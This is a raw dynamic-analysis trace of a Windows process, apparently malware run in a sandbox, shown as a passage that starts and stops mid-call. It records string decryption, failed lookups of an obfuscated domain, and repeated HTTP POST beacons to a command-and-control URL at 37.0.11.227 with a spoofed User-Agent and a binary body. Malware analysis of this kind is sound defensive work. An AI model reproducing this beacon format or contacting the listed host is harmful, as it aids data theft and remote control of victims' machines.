(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.969] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.970] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.970] GetProcessHeap () returned 0x690000 [0297.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0297.970] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.970] GetProcessHeap () returned 0x690000 [0297.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0297.971] GetProcessHeap () returned 0x690000 [0297.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.971] GetProcessHeap () returned 0x690000 [0297.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0297.972] GetProcessHeap () returned 0x690000 [0297.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0297.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.978] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0297.985] GetProcessHeap () returned 0x690000 [0297.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0297.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.986] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0297.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.987] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.988] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.988] GetProcessHeap () returned 0x690000 [0297.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0297.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.990] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0297.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.991] CryptDestroyKey (hKey=0x69d028) returned 1 [0297.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.992] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0297.992] GetProcessHeap () returned 0x690000 [0297.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.993] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0297.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.994] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0297.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.995] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0297.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.996] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0297.996] GetProcessHeap () returned 0x690000 [0297.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0297.997] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0297.997] GetProcessHeap () returned 0x690000 [0297.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0297.997] socket (af=2, type=1, protocol=6) returned 0x9bc [0297.997] connect (s=0x9bc, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0298.021] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0298.021] GetProcessHeap () returned 0x690000 [0298.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0298.021] GetProcessHeap () returned 0x690000 [0298.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0298.022] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.023] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.023] GetProcessHeap () returned 0x690000 [0298.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0298.023] GetProcessHeap () returned 0x690000 [0298.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.024] GetProcessHeap () returned 0x690000 [0298.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0298.024] GetProcessHeap () returned 0x690000 [0298.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0298.025] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.025] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.026] GetProcessHeap () returned 0x690000 [0298.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0298.026] GetProcessHeap () returned 0x690000 [0298.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.028] send (s=0x9bc, buf=0x6ad508*, len=242, flags=0) returned 242 [0298.028] send (s=0x9bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0298.028] GetProcessHeap () returned 0x690000 [0298.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0298.028] recv (in: s=0x9bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0298.115] GetProcessHeap () returned 0x690000 [0298.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0298.116] GetProcessHeap () returned 0x690000 [0298.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0298.117] GetProcessHeap () returned 0x690000 [0298.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0298.117] GetProcessHeap () returned 0x690000 [0298.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0298.118] closesocket (s=0x9bc) returned 0 [0298.119] GetProcessHeap () returned 0x690000 [0298.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0298.119] GetProcessHeap () returned 0x690000 [0298.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.120] GetProcessHeap () returned 0x690000 [0298.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0298.120] GetProcessHeap () returned 0x690000 [0298.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0298.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x590) returned 0x9bc [0298.124] Sleep (dwMilliseconds=0xea60) [0298.125] GetProcessHeap () returned 0x690000 [0298.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0298.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0298.144] GetProcessHeap () returned 0x690000 [0298.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0298.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.146] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0298.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.147] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.148] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.148] GetProcessHeap () returned 0x690000 [0298.148] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0298.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.162] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0298.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.163] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0298.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.164] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0298.164] GetProcessHeap () returned 0x690000 [0298.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.165] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.166] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.168] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.169] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.169] GetProcessHeap () returned 0x690000 [0298.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0298.169] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.169] GetProcessHeap () returned 0x690000 [0298.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0298.170] GetProcessHeap () returned 0x690000 [0298.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.170] GetProcessHeap () returned 0x690000 [0298.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0298.170] GetProcessHeap () returned 0x690000 [0298.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0298.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.172] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.178] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0298.184] GetProcessHeap () returned 0x690000 [0298.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0298.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.185] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0298.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.186] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.187] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.187] GetProcessHeap () returned 0x690000 [0298.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0298.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.189] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0298.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.190] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0298.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.191] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0298.191] GetProcessHeap () returned 0x690000 [0298.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.192] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0298.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.193] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0298.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.194] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0298.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.195] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0298.195] GetProcessHeap () returned 0x690000 [0298.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0298.195] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0298.195] GetProcessHeap () returned 0x690000 [0298.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0298.195] socket (af=2, type=1, protocol=6) returned 0x9c0 [0298.196] connect (s=0x9c0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0298.217] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0298.217] GetProcessHeap () returned 0x690000 [0298.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0298.217] GetProcessHeap () returned 0x690000 [0298.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0298.218] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.219] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.219] GetProcessHeap () returned 0x690000 [0298.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0298.219] GetProcessHeap () returned 0x690000 [0298.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.220] GetProcessHeap () returned 0x690000 [0298.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0298.220] GetProcessHeap () returned 0x690000 [0298.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0298.220] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.221] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.221] GetProcessHeap () returned 0x690000 [0298.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0298.221] GetProcessHeap () returned 0x690000 [0298.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.222] send (s=0x9c0, buf=0x6ad508*, len=242, flags=0) returned 242 [0298.222] send (s=0x9c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0298.222] GetProcessHeap () returned 0x690000 [0298.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0298.223] recv (in: s=0x9c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0298.297] GetProcessHeap () returned 0x690000 [0298.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0298.298] GetProcessHeap () returned 0x690000 [0298.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0298.298] GetProcessHeap () returned 0x690000 [0298.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0298.298] GetProcessHeap () returned 0x690000 [0298.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0298.298] closesocket (s=0x9c0) returned 0 [0298.299] GetProcessHeap () returned 0x690000 [0298.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0298.299] GetProcessHeap () returned 0x690000 [0298.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.300] GetProcessHeap () returned 0x690000 [0298.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0298.300] GetProcessHeap () returned 0x690000 [0298.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0298.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7c0) returned 0x9c0 [0298.302] Sleep (dwMilliseconds=0xea60) [0298.304] GetProcessHeap () returned 0x690000 [0298.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0298.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.305] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0298.324] GetProcessHeap () returned 0x690000 [0298.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0298.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.325] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0298.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.326] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.327] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.327] GetProcessHeap () returned 0x690000 [0298.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0298.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.328] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0298.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.329] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0298.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.330] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0298.330] GetProcessHeap () returned 0x690000 [0298.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0298.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.331] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.332] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.333] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.334] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.334] GetProcessHeap () returned 0x690000 [0298.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0298.334] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), 